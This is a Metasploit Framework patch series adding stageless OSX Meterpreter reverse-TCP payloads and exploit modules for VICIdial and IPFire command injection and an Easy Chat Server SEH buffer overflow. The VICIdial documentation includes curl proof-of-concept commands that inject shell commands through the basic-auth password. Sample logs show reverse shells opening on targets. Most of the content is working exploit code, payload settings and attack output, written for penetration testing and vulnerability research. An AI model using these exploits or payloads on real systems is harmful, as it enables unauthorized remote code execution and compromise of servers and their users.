From d333077308e865034571a46a3fe9375612c2a57b Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 23 May 2017 09:47:23 +0800 Subject: [PATCH 01/63] osx meterpreter --- lib/msf/base/sessions/meterpreter_x64_osx.rb | 29 ++++++++++++++ lib/msf/util/exe.rb | 28 ++++++++----- .../osx/x64/meterpreter_reverse_tcp.rb | 40 +++++++++++++++++++ 3 files changed, 87 insertions(+), 10 deletions(-) create mode 100644 lib/msf/base/sessions/meterpreter_x64_osx.rb create mode 100644 modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb diff --git a/lib/msf/base/sessions/meterpreter_x64_osx.rb b/lib/msf/base/sessions/meterpreter_x64_osx.rb new file mode 100644 index 0000000000..2e507e9055 --- /dev/null +++ b/lib/msf/base/sessions/meterpreter_x64_osx.rb @@ -0,0 +1,29 @@ +# -*- coding: binary -*- + +require 'msf/base/sessions/meterpreter' + +module Msf +module Sessions + +### +# +# This class creates a platform-specific meterpreter session type +# +### +class Meterpreter_x64_OSX < Msf::Sessions::Meterpreter + def supports_ssl? + false + end + def supports_zlib? + false + end + def initialize(rstream, opts={}) + super + self.base_platform = 'osx' + self.base_arch = ARCH_X64 + end +end + +end +end + diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index d41f3876e7..d05f043ed7 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -106,7 +106,7 @@ require 'msf/core/exe/segment_appender' # @return [String] # @return [NilClass] def self.to_executable(framework, arch, plat, code = '', opts = {}) - if elf? code + if elf? code or macho? code return code end @@ -2122,15 +2122,19 @@ require 'msf/core/exe/segment_appender' end end when 'macho', 'osx-app' - macho = case arch - when ARCH_X86,nil - to_osx_x86_macho(framework, code, exeopts) - when ARCH_X64 - to_osx_x64_macho(framework, code, exeopts) - when ARCH_ARMLE - to_osx_arm_macho(framework, code, exeopts) - when ARCH_PPC - to_osx_ppc_macho(framework, code, exeopts) + if macho? code + macho = code + else + macho = case arch + when ARCH_X86,nil + to_osx_x86_macho(framework, code, exeopts) + when ARCH_X64 + to_osx_x64_macho(framework, code, exeopts) + when ARCH_ARMLE + to_osx_arm_macho(framework, code, exeopts) + when ARCH_PPC + to_osx_ppc_macho(framework, code, exeopts) + end end fmt == 'osx-app' ? Msf::Util::EXE.to_osx_app(macho) : macho when 'vba' @@ -2258,6 +2262,10 @@ require 'msf/core/exe/segment_appender' code[0..3] == "\x7FELF" end + def self.macho?(code) + code[0..3] == "\xCF\xFA\xED\xFE" + end + end end end diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb new file mode 100644 index 0000000000..dbb741e67c --- /dev/null +++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb @@ -0,0 +1,40 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_tcp' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_x64_osx' + +module MetasploitModule + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'OSX Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'osx', + 'Arch' => ARCH_X64, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::Meterpreter_x64_OSX + ) + ) + end + + def generate + opts = {scheme: 'tcp'} + MetasploitPayloads::Mettle.new('x86_64-apple-darwin', generate_config(opts)).to_binary :exec + end +end From a9e6df6f158b375ad2da721f467902df8bfdba34 Mon Sep 17 00:00:00 2001 From: Tim Date: Fri, 26 May 2017 15:55:14 +0800 Subject: [PATCH 02/63] fix shell command on osx meterpreter --- .../meterpreter/ui/console/command_dispatcher/stdapi/sys.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb index acfe737328..774617bcbe 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb @@ -257,7 +257,7 @@ class Console::CommandDispatcher::Stdapi::Sys print_error( "Failed to spawn shell with thread impersonation. Retrying without it." ) cmd_execute("-f", path, "-c", "-H", "-i") end - when 'linux' + when 'linux', 'osx' # Don't expand_path() this because it's literal anyway path = "/bin/sh" cmd_execute("-f", path, "-c", "-i") From 1582d3a90261aa2e03d6f7e73dffbb98b48ba25e Mon Sep 17 00:00:00 2001 From: Tim Date: Fri, 26 May 2017 15:55:42 +0800 Subject: [PATCH 03/63] support i386 --- lib/msf/base/sessions/meterpreter_x86_osx.rb | 29 ++++++++++++++ .../osx/x86/meterpreter_reverse_tcp.rb | 40 +++++++++++++++++++ 2 files changed, 69 insertions(+) create mode 100644 lib/msf/base/sessions/meterpreter_x86_osx.rb create mode 100644 modules/payloads/singles/osx/x86/meterpreter_reverse_tcp.rb diff --git a/lib/msf/base/sessions/meterpreter_x86_osx.rb b/lib/msf/base/sessions/meterpreter_x86_osx.rb new file mode 100644 index 0000000000..c7e25efac9 --- /dev/null +++ b/lib/msf/base/sessions/meterpreter_x86_osx.rb @@ -0,0 +1,29 @@ +# -*- coding: binary -*- + +require 'msf/base/sessions/meterpreter' + +module Msf +module Sessions + +### +# +# This class creates a platform-specific meterpreter session type +# +### +class Meterpreter_x86_OSX < Msf::Sessions::Meterpreter + def supports_ssl? + false + end + def supports_zlib? + false + end + def initialize(rstream, opts={}) + super + self.base_platform = 'osx' + self.base_arch = ARCH_X86 + end +end + +end +end + diff --git a/modules/payloads/singles/osx/x86/meterpreter_reverse_tcp.rb b/modules/payloads/singles/osx/x86/meterpreter_reverse_tcp.rb new file mode 100644 index 0000000000..756e3f5e73 --- /dev/null +++ b/modules/payloads/singles/osx/x86/meterpreter_reverse_tcp.rb @@ -0,0 +1,40 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_tcp' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_x86_osx' + +module MetasploitModule + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'OSX Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ' + ], + 'Platform' => 'osx', + 'Arch' => ARCH_X86, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::Meterpreter_x86_OSX + ) + ) + end + + def generate + opts = {scheme: 'tcp'} + MetasploitPayloads::Mettle.new('i386-apple-darwin', generate_config(opts)).to_binary :exec + end +end From 018e544295cfb84db0699890d02a4fca290f8da8 Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Sat, 27 May 2017 05:09:38 +0000 Subject: [PATCH 04/63] Add VICIdial user_authorization Unauthenticated Command Execution module --- ...dial_user_authorization_unauth_cmd_exec.rb | 112 ++++++++++++++++++ 1 file changed, 112 insertions(+) create mode 100644 modules/exploits/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.rb diff --git a/modules/exploits/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.rb b/modules/exploits/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.rb new file mode 100644 index 0000000000..42f5bc6090 --- /dev/null +++ b/modules/exploits/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.rb @@ -0,0 +1,112 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'VICIdial user_authorization Unauthenticated Command Execution', + 'Description' => %q{ + This module exploits a vulnerability in VICIdial versions + 2.9 RC 1 to 2.13 RC1 which allows unauthenticated users + to execute arbitrary operating system commands as the web + server user if password encryption is enabled (disabled + by default). + + When password encryption is enabled the user's password + supplied using HTTP basic authentication is used in a call + to exec(). + + This module has been tested successfully on version 2.11 RC2 + and 2.13 RC1 on CentOS. + }, + 'License' => MSF_LICENSE, + 'Author' => 'Brendan Coles ', + 'References' => + [ + ['URL', 'http://www.vicidial.org/VICIDIALmantis/view.php?id=1016'] + ], + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Payload' => + { + # HTTP Basic authentication password + 'Space' => 2048, + # apostrophe ('), quote ("), semi-colon (;) and backslash (\) + # are removed by preg_replace + 'BadChars' => "\x00\x0A\x22\x27\x3B\x5C", + 'DisableNops' => true, + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic perl python netcat' + } + }, + 'Targets' => [[ 'Automatic Targeting', {} ]], + 'Privileged' => false, + 'DisclosureDate' => 'May 26 2017', + 'DefaultTarget' => 0)) + register_options([ OptString.new('TARGETURI', [true, 'The base path to VICIdial', '/vicidial/']) ]) + deregister_options('USERNAME', 'PASSWORD') + end + + def check + user = rand_text_alpha(rand(10) + 5) + pass = "#{rand_text_alpha(rand(10) + 5)}&#" + res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'vicidial_sales_viewer.php'), + 'authorization' => basic_auth(user, pass) + + unless res + vprint_status 'Connection failed' + return CheckCode::Unknown + end + + if res.code != 401 + vprint_status "#{peer} Unexpected reply. Expected authentication failure." + return CheckCode::Safe + end + + # Check for input filtering of '#' and '&' characters in password + # Response for invalid credentials is in the form of: |||BAD| + if res.body !~ /\|#{user}\|#{pass}\|BAD\|/ + vprint_status "#{peer} Target is patched." + return CheckCode::Safe + end + + # Check for ../agc/bp.pl password encryption script + res = send_request_cgi 'uri' => normalize_uri(target_uri.path, '..', 'agc', 'bp.pl') + if res && res.code == 200 && res.body =~ /Bcrypt password hashing script/ + vprint_status "#{peer} Password encryption is supported, but may not be enabled." + return CheckCode::Appears + end + + vprint_status "#{peer} Could not verify whether password encryption is supported." + CheckCode::Detected + end + + def execute_command(cmd, opts = {}) + user = rand_text_alpha(rand(10) + 5) + pass = "#{rand_text_alpha(rand(10) + 5)}& #{cmd} #" + + print_status "#{peer} Sending payload (#{cmd.length} bytes)" + res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'vicidial_sales_viewer.php'), + 'authorization' => basic_auth(user, pass) + + if !res + fail_with(Failure::Unreachable, 'Connection failed') + elsif res.code == 401 && res.body =~ /#{user}/ && res.body =~ /BAD/ + print_good "#{peer} Payload sent successfully" + else + fail_with(Failure::UnexpectedReply, 'Unexpected reply') + end + end + + def exploit + execute_command(payload.encoded) + end +end From dfb5806dcb623d11f9621961068181abb1badc6d Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Sun, 28 May 2017 03:08:45 +0000 Subject: [PATCH 05/63] Add documentation --- ...dial_user_authorization_unauth_cmd_exec.md | 133 ++++++++++++++++++ 1 file changed, 133 insertions(+) create mode 100644 documentation/modules/exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.md diff --git a/documentation/modules/exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.md b/documentation/modules/exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.md new file mode 100644 index 0000000000..708867cde1 --- /dev/null +++ b/documentation/modules/exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec.md @@ -0,0 +1,133 @@ +## Description + + This module exploits a vulnerability in VICIdial versions 2.9 RC1 to 2.13 RC1 which allows unauthenticated users to execute arbitrary operating system commands as the web server user if password encryption is enabled (disabled by default). + + When password encryption is enabled the user's password supplied using HTTP basic authentication is used in a call to `exec()`. + + This module has been tested successfully on version 2.11 RC2 and 2.13 RC1 on CentOS. + + +## Vulnerable Application + + VICIDIAL is a software suite that is designed to interact with the Asterisk Open-Source PBX Phone system to act as a complete inbound/outbound contact center suite with inbound email support as well. + + This module has been tested successfully on version 2.11 RC2 and 2.13 RC1 on CentOS. + + Installers: + + * [VICIdial 2.11 RC1](https://sourceforge.net/projects/astguiclient/files/astguiclient_2.11rc1.zip/download) + * [VICIdial 2.13 RC1](https://sourceforge.net/projects/astguiclient/files/astguiclient_2.13rc1.zip/download) + + Follow the [instructions to enabled password encryption](http://vicidial.org/docs/ENCRYPTED_PASSWORDS.txt). + + +## Technical Details + + The `functions.php` file defines a function called `user_authorization`: + + ```php + function user_authorization($user,$pass,$user_option,$user_update) + ``` + + This function is used throughout the application to validate user logon credentials supplied using HTTP basic authentication. If password encryption is enabled the user's password is passed to the `pass` argument of the `bp.pl` Perl script, without quotes, using PHP's `exec()` function: + + ```php + if ($SSpass_hash_enabled > 0) + { + if (file_exists("../agc/bp.pl")) + {$pass_hash = exec("../agc/bp.pl --pass=$pass");} + else + {$pass_hash = exec("../../agc/bp.pl --pass=$pass");} + ``` + + A rudimentary blacklist is used to prevent command injection. The apostrophe `'`, quote `"`, semi-colon `;` and backslash `\` characters are removed from the user's username and password using `preg_replace`, like so: + + ```php + $user = preg_replace("/\'|\"|\\\\|;/","",$user); + $pass = preg_replace("/\'|\"|\\\\|;/","",$pass); + ``` + + It is trivial to bypass the blacklist. + + For example, backticks ``` ` ```, pipe `|` or ampersand `&` are sufficient to bypass the blacklist and execute arbitrary operating system commands. + + For the purposes of exploitation, reaching the `user_authorization` function call with malicious input is hindered by additional input validation in use prior to the authentication check throughout the majority of the codebase: + + ```php + $PHP_AUTH_USER = preg_replace('/[^-_0-9a-zA-Z]/', '', $PHP_AUTH_USER); + $PHP_AUTH_PW = preg_replace('/[^-_0-9a-zA-Z]/', '', $PHP_AUTH_PW); + ``` + + However, in VICIdial version 2.11RC2, at least two files did not make use of the additional validation: + + * help.php + * vicidial_sales_viewer.php + + In VICIdial version 2.13RC1, at least one file did not make use of the additional validation: + + * vicidial_sales_viewer.php + + This vulnerability was patched in revision 2759. + + +## Proof of Concept + + ```bash + $ curl -isk "https://VICIdial.local/vicidial/vicidial_sales_viewer.php" \ + --user 'anyusername:anypassword& id>/tmp/pwned_by_sales_viewer #' + ``` + + ```bash + $ curl -isk "https://VICIdial.local/vicidial/help.php" \ + --user 'anyusername:anypassword& id>/tmp/pwned_by_help #' + ``` + + Note that `/tmp/pwned_by_help` and `/tmp/pwned_by_sales_viewer` files should contain the results of the `id` command. + + +## Verification Steps + + 1. Start `msfconsole` + 2. Do: `use exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec` + 3. Do: `set rhost [IP]` + 4. Do: `run` + 5. You should get a session + + +## Sample Output + + ``` + msf exploit(vicidial_user_authorization_unauth_cmd_exec) > check + [*] 172.16.191.150:80 The target appears to be vulnerable. + msf exploit(vicidial_user_authorization_unauth_cmd_exec) > run + + [*] Started reverse TCP handler on 172.16.191.181:4444 + [*] 172.16.191.150:80 Sending payload (505 bytes) + [+] 172.16.191.150:80 Payload sent successfully + [*] Command shell session 1 opened (172.16.191.181:4444 -> 172.16.191.150:36660) at 2017-05-27 01:00:41 -0400 + + id + uid=48(apache) gid=48(apache) groups=48(apache) + ``` + + +## Sample Output (Verbose) + + ``` + msf exploit(vicidial_user_authorization_unauth_cmd_exec) > set verbose true + verbose => true + msf exploit(vicidial_user_authorization_unauth_cmd_exec) > check + + [*] 172.16.191.150:80 Password encryption is supported, but may not be enabled. + [*] 172.16.191.150:80 The target appears to be vulnerable. + msf exploit(vicidial_user_authorization_unauth_cmd_exec) > run + + [*] Started reverse TCP handler on 172.16.191.181:4444 + [*] 172.16.191.150:80 Sending payload (505 bytes) + [+] 172.16.191.150:80 Payload sent successfully + [*] Command shell session 2 opened (172.16.191.181:4444 -> 172.16.191.150:36661) at 2017-05-27 01:00:48 -0400 + + id + uid=48(apache) gid=48(apache) groups=48(apache) + ``` + From 32a83e0d30eeb4c8c2372d90620f2153d293dafe Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 30 May 2017 14:00:24 +0800 Subject: [PATCH 06/63] update macho check for 32bit + fat --- lib/msf/util/exe.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index d05f043ed7..9bbaba952e 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -2263,7 +2263,7 @@ require 'msf/core/exe/segment_appender' end def self.macho?(code) - code[0..3] == "\xCF\xFA\xED\xFE" + code[0..3] == "\xCF\xFA\xED\xFE" || code[0..3] == "\xCE\xFA\xED\xFE" || code[0..3] == "\xCA\xFE\xBA\xBE" end end From c35dffc6488200aef9443d1a2675bfee1b6b2026 Mon Sep 17 00:00:00 2001 From: h00die Date: Wed, 14 Jun 2017 08:04:17 -0400 Subject: [PATCH 07/63] first draft of oinkcode --- .../linux/http/ipfire_oinkcode_exec.rb | 111 ++++++++++++++++++ 1 file changed, 111 insertions(+) create mode 100644 modules/exploits/linux/http/ipfire_oinkcode_exec.rb diff --git a/modules/exploits/linux/http/ipfire_oinkcode_exec.rb b/modules/exploits/linux/http/ipfire_oinkcode_exec.rb new file mode 100644 index 0000000000..57c1d8a0bf --- /dev/null +++ b/modules/exploits/linux/http/ipfire_oinkcode_exec.rb @@ -0,0 +1,111 @@ +## +## This module requires Metasploit: http://metasploit.com/download +## Current source: https://github.com/rapid7/metasploit-framework +### + +class MetasploitModule < Msf::Exploit::Remote + include Msf::Exploit::Remote::HttpClient + + Rank = ExcellentRanking + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'IPFire proxy.cgi RCE', + 'Description' => %q( + IPFire, a free linux based open source firewall distribution, + version < 2.19 Update Core 110 contains a remote command execution + vulnerability in the ids.cgi page in the OINKCODE field. + ), + 'Author' => + [ + 'h00die ', # module + '0x09AL' # discovery + ], + 'References' => + [ + [ 'EDB', '42149' ] + ], + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Privileged' => false, + 'DefaultOptions' => { 'SSL' => true }, + 'Arch' => [ ARCH_CMD ], + 'Payload' => + { + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'perl awk openssl' + } + }, + 'Targets' => + [ + [ 'Automatic Target', {}] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jun 09 2016' + ) + ) + + register_options( + [ + OptString.new('USERNAME', [ true, 'User to login with', 'admin']), + OptString.new('PASSWORD', [ false, 'Password to login with', '']), + Opt::RPORT(444) + ], self.class + ) + end + + def check + begin + res = send_request_cgi( + 'uri' => '/cgi-bin/pakfire.cgi', + 'method' => 'GET' + ) + fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? + fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200 + /\IPFire (?[\d.]{4}) \([\w]+\) - Core Update (?[\d]+)/ =~ res.body + + if version && update && version == "2.19" && update.to_i <= 110 + Exploit::CheckCode::Appears + else + Exploit::CheckCode::Safe + end + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") + end + end + + def exploit + begin + + res = send_request_cgi( + 'uri' => '/cgi-bin/ids.cgi', + 'method' => 'POST', + 'ctype' => 'application/x-www-form-urlencoded', + 'headers' => + { + 'Referer' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi" + }, + 'data' => { + 'ENABLE_SNORT_GREEN' => 'on', + 'ENABLE_SNORT' => 'on', + 'RULES' => 'registered', + 'OINKCODE' => "`#{payload.encoded}`", + 'ACTION' => 'Download new ruleset', + 'ACTION2' => 'snort' + }, + ) + + # success means we hang our session, and wont get back a response + if res + fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? + fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200 + end + + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") + end + end +end From 46ffd250a04422b87d3a3c957f546a13606c66b3 Mon Sep 17 00:00:00 2001 From: h00die Date: Wed, 14 Jun 2017 21:15:56 -0400 Subject: [PATCH 08/63] module working and docs --- .../linux/http/ipfire_oinkcode_exec.md | 48 +++++++++++++++++++ .../linux/http/ipfire_oinkcode_exec.rb | 11 +++-- 2 files changed, 56 insertions(+), 3 deletions(-) create mode 100644 documentation/modules/exploit/linux/http/ipfire_oinkcode_exec.md diff --git a/documentation/modules/exploit/linux/http/ipfire_oinkcode_exec.md b/documentation/modules/exploit/linux/http/ipfire_oinkcode_exec.md new file mode 100644 index 0000000000..c6ead925f9 --- /dev/null +++ b/documentation/modules/exploit/linux/http/ipfire_oinkcode_exec.md @@ -0,0 +1,48 @@ +## Vulnerable Application + + Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core110/ipfire-2.19.x86_64-full-core110.iso) + +This module has been verified against: + +1. 2.19 core 100 +2. 2.19 core 110 (exploit-db, not metasploit module) + +## Verification Steps + + 1. Install the firewall + 2. Start msfconsole + 3. Do: ```use exploit/linux/http/ipfire_oinkcode_exec``` + 4. Do: ```set password admin``` or whatever it was set to at install + 5. Do: ```set rhost 10.10.10.10``` + 6. Do: ```set payload cmd/unix/reverse_perl``` + 7. Do: ```set lhost 192.168.2.229``` + 8. Do: ```exploit``` + 9. You should get a shell. + +## Options + + **PASSWORD** + + Password is set at install. May be blank, 'admin', or 'ipfire'. + +## Scenarios + + ``` + msf > use exploit/linux/http/ipfire_oinkcode_exec + msf exploit(ipfire_oinkcode_exec) > set password admin + password => admin + msf exploit(ipfire_oinkcode_exec) > set rhost 192.168.2.201 + rhost => 192.168.2.201 + msf exploit(ipfire_oinkcode_exec) > set verbose true + verbose => true + msf exploit(ipfire_oinkcode_exec) > check + [*] 192.168.2.201:444 The target appears to be vulnerable. + msf exploit(ipfire_oinkcode_exec) > exploit + + [*] Started reverse TCP handler on 192.168.2.117:4444 + [*] Command shell session 1 opened (192.168.2.117:4444 -> 192.168.2.201:38412) at 2017-06-14 21:12:21 -0400 + id + uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid) + whoami + nobody + ``` \ No newline at end of file diff --git a/modules/exploits/linux/http/ipfire_oinkcode_exec.rb b/modules/exploits/linux/http/ipfire_oinkcode_exec.rb index 57c1d8a0bf..4057efc333 100644 --- a/modules/exploits/linux/http/ipfire_oinkcode_exec.rb +++ b/modules/exploits/linux/http/ipfire_oinkcode_exec.rb @@ -59,9 +59,12 @@ class MetasploitModule < Msf::Exploit::Remote def check begin + # authorization header required, see https://github.com/rapid7/metasploit-framework/pull/6433#r56764179 + # after a chat with @bcoles in IRC. res = send_request_cgi( 'uri' => '/cgi-bin/pakfire.cgi', - 'method' => 'GET' + 'method' => 'GET', + 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) ) fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200 @@ -79,16 +82,18 @@ class MetasploitModule < Msf::Exploit::Remote def exploit begin - + # authorization header required, see https://github.com/rapid7/metasploit-framework/pull/6433#r56764179 + # after a chat with @bcoles in IRC. res = send_request_cgi( 'uri' => '/cgi-bin/ids.cgi', 'method' => 'POST', 'ctype' => 'application/x-www-form-urlencoded', + 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'headers' => { 'Referer' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi" }, - 'data' => { + 'vars_post' => { 'ENABLE_SNORT_GREEN' => 'on', 'ENABLE_SNORT' => 'on', 'RULES' => 'registered', From e005e51f05d8784689395d93f284d48cc428fffa Mon Sep 17 00:00:00 2001 From: h00die Date: Fri, 16 Jun 2017 06:48:31 -0400 Subject: [PATCH 09/63] some edits finished --- .../linux/http/ipfire_oinkcode_exec.rb | 22 +++++++++---------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/modules/exploits/linux/http/ipfire_oinkcode_exec.rb b/modules/exploits/linux/http/ipfire_oinkcode_exec.rb index 4057efc333..e4ad96b6ce 100644 --- a/modules/exploits/linux/http/ipfire_oinkcode_exec.rb +++ b/modules/exploits/linux/http/ipfire_oinkcode_exec.rb @@ -44,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote [ 'Automatic Target', {}] ], 'DefaultTarget' => 0, - 'DisclosureDate' => 'Jun 09 2016' + 'DisclosureDate' => 'Jun 09 2017' ) ) @@ -53,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote OptString.new('USERNAME', [ true, 'User to login with', 'admin']), OptString.new('PASSWORD', [ false, 'Password to login with', '']), Opt::RPORT(444) - ], self.class + ] ) end @@ -62,18 +62,18 @@ class MetasploitModule < Msf::Exploit::Remote # authorization header required, see https://github.com/rapid7/metasploit-framework/pull/6433#r56764179 # after a chat with @bcoles in IRC. res = send_request_cgi( - 'uri' => '/cgi-bin/pakfire.cgi', - 'method' => 'GET', + 'uri' => '/cgi-bin/pakfire.cgi', + 'method' => 'GET', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) ) fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200 /\IPFire (?[\d.]{4}) \([\w]+\) - Core Update (?[\d]+)/ =~ res.body - if version && update && version == "2.19" && update.to_i <= 110 - Exploit::CheckCode::Appears + if version && update && version.eql? "2.19" && update.to_i <= 110 + CheckCode::Appears else - Exploit::CheckCode::Safe + CheckCode::Safe end rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") @@ -87,11 +87,10 @@ class MetasploitModule < Msf::Exploit::Remote res = send_request_cgi( 'uri' => '/cgi-bin/ids.cgi', 'method' => 'POST', - 'ctype' => 'application/x-www-form-urlencoded', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'headers' => { - 'Referer' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi" + 'Referer' => "#{datstore['SSL'] ? 'https' : 'http'}://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi" }, 'vars_post' => { 'ENABLE_SNORT_GREEN' => 'on', @@ -100,13 +99,14 @@ class MetasploitModule < Msf::Exploit::Remote 'OINKCODE' => "`#{payload.encoded}`", 'ACTION' => 'Download new ruleset', 'ACTION2' => 'snort' - }, + } ) # success means we hang our session, and wont get back a response if res - fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200 + else + fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") end rescue ::Rex::ConnectionError From bc826cb82426209333eeeec87b1380a849b63a88 Mon Sep 17 00:00:00 2001 From: Mzack9999 Date: Tue, 20 Jun 2017 00:36:59 +0200 Subject: [PATCH 10/63] Easy Chat Server From 2.0 to 3.1 - Buffer Overflow (SEH) exploit --- .../windows/http/easychatserver_seh.rb | 62 +++++++++++++++++++ 1 file changed, 62 insertions(+) create mode 100644 modules/exploits/windows/http/easychatserver_seh.rb diff --git a/modules/exploits/windows/http/easychatserver_seh.rb b/modules/exploits/windows/http/easychatserver_seh.rb new file mode 100644 index 0000000000..906614f189 --- /dev/null +++ b/modules/exploits/windows/http/easychatserver_seh.rb @@ -0,0 +1,62 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + #include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Easy Chat Server User Registeration Buffer Overflow (SEH)', + 'Description' => %q{ + This module exploits a buffer overflow during user registration in Easy Chat Server software. + }, + 'Author' => + [ + 'Aitezaz Mohsin', #POC + 'Marco Rivoli ' #Metasploit + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'EDB', '42186' ], + ], + 'Privileged' => true, + 'Payload' => + { + 'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e", + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Easy Chat Server 2.0 to 3.1', { 'Ret' => 0x100104bc } ], + ], + 'DefaultOptions' => { + 'RPORT' => 80, + 'EXITFUNC' => 'thread', + 'ENCODER' => 'x86/alpha_mixed' + }, + 'DisclosureDate' => 'Oct 09 2017', + 'DefaultTarget' => 0)) + end + + def exploit + sploit = rand_text_alpha_upper(217) + sploit << "\xeb\x06\x90\x90" + sploit << [target.ret].pack('V') + sploit << payload.encoded + sploit << rand_text_alpha_upper(200) + sploit << [target.ret].pack('V') + + request = "POST /registresult.htm HTTP/1.1\r\n\r\nUserName=#{sploit}&Password=test&Password1=test&Sex=1&Email=x@&Icon=x.gif&Resume=xxxx&cw=1&RoomID=4&RepUserName=admin&submit1=Register" + connect + sock.put(request) + handler + disconnect + end +end From 0b04dc05844b48a95e31c415c87ec9f10b296643 Mon Sep 17 00:00:00 2001 From: Mzack9999 